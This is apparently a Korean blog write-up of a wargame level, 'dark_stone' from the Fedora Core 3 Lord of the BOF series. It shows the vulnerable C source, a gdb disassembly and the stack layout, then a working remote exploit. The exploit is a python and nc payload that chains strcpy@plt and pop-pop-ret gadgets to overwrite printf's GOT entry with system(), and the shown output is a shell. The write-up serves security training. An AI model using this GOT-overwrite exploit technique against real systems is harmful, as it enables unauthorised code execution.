2017. 12. 1. 20:08ㆍSystemHacking/Fedora Catle
evil_wizard / get down like that
이전 문제와 푸는 방법은 같지만 Remote 라는 점만 다르다 ( cat 과 nc를 이용한 풀이 )
[ dark_stone.c ]
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 | /* The Lord of the BOF : The Fellowship of the BOF - dark_stone - Remote BOF on Fedora Core 3 - hint : GOT overwriting again - port : TCP 8888 */ #include <stdio.h> // magic potion for you void pop_pop_ret(void) { asm("pop %eax"); asm("pop %eax"); asm("ret"); } int main() { char buffer[256]; char saved_sfp[4]; int length; char temp[1024]; printf("dark_stone : how fresh meat you are!\n"); printf("you : "); fflush(stdout); // give me a food fgets(temp, 1024, stdin); // 오버 플로우 발생 ! // for disturbance RET sleding length = strlen(temp); // save sfp memcpy(saved_sfp, buffer+264, 4); // overflow!! strcpy(buffer, temp); // restore sfp memcpy(buffer+264, saved_sfp, 4); // disturbance RET sleding memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length)); // buffer cleaning memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000); printf("%s\n", buffer); } |
[ 소스코드 디버깅 ]
0x080484f8 <main+0>: push ebp
0x080484f9 <main+1>: mov ebp,esp
0x080484fb <main+3>: sub esp,0x518
0x08048501 <main+9>: and esp,0xfffffff0
....
0x0804851f <main+39>: call 0x8048408 <_init+104> printf()
0x08048524 <main+44>: add esp,0x10
0x08048527 <main+47>: sub esp,0xc
0x0804852a <main+50>: push 0x804873e
0x0804852f <main+55>: call 0x8048408 <_init+104> printf()
0x08048534 <main+60>: add esp,0x10
0x08048537 <main+63>: sub esp,0xc
0x0804853a <main+66>: push ds:0x8049868
0x08048540 <main+72>: call 0x80483c8 <_init+40> fflush()
0x08048545 <main+77>: add esp,0x10
0x08048548 <main+80>: sub esp,0x4
....
0x0804854b <main+83>: push ds:0x804986c
0x08048551 <main+89>: push 0x400
0x08048556 <main+94>: lea eax,[ebp-1304]
0x0804855c <main+100>: push eax
0x0804855d <main+101>: call 0x80483d8 <_init+56> fgets(temp,1024,stdin)
....
0x08048580 <main+136>: push 0x4
0x08048582 <main+138>: lea eax,[ebp-264]
0x08048588 <main+144>: add eax,0x108
0x0804858d <main+149>: push eax
0x0804858e <main+150>: lea eax,[ebp-268]
0x08048594 <main+156>: push eax
0x08048595 <main+157>: call 0x8048418 <_init+120> memcpy(saved_sfp,buffer+264,4)
0x0804859a <main+162>: add esp,0x10
0x0804859d <main+165>: sub esp,0x8
....
0x080485a0 <main+168>: lea eax,[ebp-1304]
0x080485a6 <main+174>: push eax
0x080485a7 <main+175>: lea eax,[ebp-264]
0x080485ad <main+181>: push eax
0x080485ae <main+182>: call 0x8048438 <_init+152> strcpy(buffer,temp)
.... strcpy's PLT
0x0804861a <main+290>: add esp,0x10
0x0804861d <main+293>: sub esp,0x8
0x08048620 <main+296>: lea eax,[ebp-264]
0x08048626 <main+302>: push eax
0x08048627 <main+303>: push 0x8048745
0x0804862c <main+308>: call 0x8048408 <_init+104> printf("%s\n",buffer)
printf's PLT
0x08048631 <main+313>: add esp,0x10
0x08048634 <main+316>: leave
0x08048635 <main+317>: ret
0x08048636 <main+318>: nop
0x08048637 <main+319>: nop
[ Stack ]
temp 1024byte
length 4byte
dummy 8byte
saved_sfp 4byte
buffer 256byte
dummy 8byte
saved ebp 0xfee87448고정
saved eip
[ 사용할 주소 ]
[evil_wizard@Fedora_1stFloor tmp]$ ./find
"/bin/sh" is at 0x833603
printf /bin/sh
strcpy() plt : 0x08048438
&pop_pop_ret : 0x080484f3
&system() : 0x007507c0
printf() plt : 0x08048408
[ PLT & GOT 계산 ]
0x0804851f <main+39>: call 0x8048408 <_init+104> printf()
(gdb) x/3i 0x8048408 printf's PLT
0x8048408 <_init+104>: jmp ds:0x804984c
0x804840e <_init+110>: push 0x20
0x8048413 <_init+115>: jmp 0x80483b8 <_init+24>
(gdb) x/x 0x804984c
0x804984c <_GLOBAL_OFFSET_TABLE_+28>: 0x0804840e printf's GOT
0x804984c 위치의 값을 &system()로 변조한다
[ 변조할 문자 ]
* 0x80484d0 <frame_dummy+12>: 0xc0 0x74 0x19 0xb8
0x80484d4 <frame_dummy+16>: 0x00
* 0x8048364 <__libc_utmp_lock+125851260>: 0x07 0x01 0x00
* 0x80482b4 <__libc_utmp_lock+125851084>: 0x75 0x74 0x00 0x66
* 0x8048366 <__libc_utmp_lock+125851262>: 0x00
[ Payload ]
[evil_wizard@Fedora_1stFloor ~]$ (python -c 'print "A" * 268 + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4c\x98\x04\x08" + "\xd0\x84\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4d\x98\x04\x08" + "\x64\x83\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4e\x98\x04\x08" + "\xb4\x82\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4f\x98\x04\x08" + "\x66\x83\x04\x08" + "\x08\x84\x04\x08" + "AAAA" + "\x03\x36\x83\x00" + "\x00\x00\x00\x0a"';cat) | nc localhost 8888
dark_stone : how fresh meat you are!
you :
id
uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t
my-pass
euid = 505
let there be light
'SystemHacking > Fedora Catle' 카테고리의 다른 글
FC3 ALL CLREAR (0) | 2017.12.13 |
---|---|
[4] hell_fire -> evil_wizard ( GOT Overwriting ) (0) | 2017.11.30 |
[3] dark_eyes -> hell_fire ( Fake EBP & fgets Cache memory / mprotect) (0) | 2017.11.28 |
[2] iron_golem -> dark_eyes ( RET Sleding ) (0) | 2017.11.28 |
[1] gate -> iron_golem ( Fake EBP ) (0) | 2017.11.28 |